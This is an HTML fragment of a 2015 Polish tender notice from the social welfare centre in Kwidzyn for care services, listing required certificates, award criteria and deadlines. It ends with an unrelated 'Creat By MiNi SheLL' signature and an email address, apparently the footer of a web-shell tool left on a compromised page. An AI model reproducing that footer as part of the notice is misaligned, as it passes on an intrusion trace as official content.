<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Liczba pracowników z zał.Nr 4 z kursem do swiadczenia us.opiekuńczych, którzy przepracowali rok i więcej na umowę o pracę wykonując usł. op. - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://mops.kwidzyn.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Kwidzynie ul. Grudziądzka 6, 825-500 Kwidzyn pok. 28.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2015 godzina 08:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Kwidzynie ul. Grudziądzka 6, 82-500 Kwidzyn pok.28.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com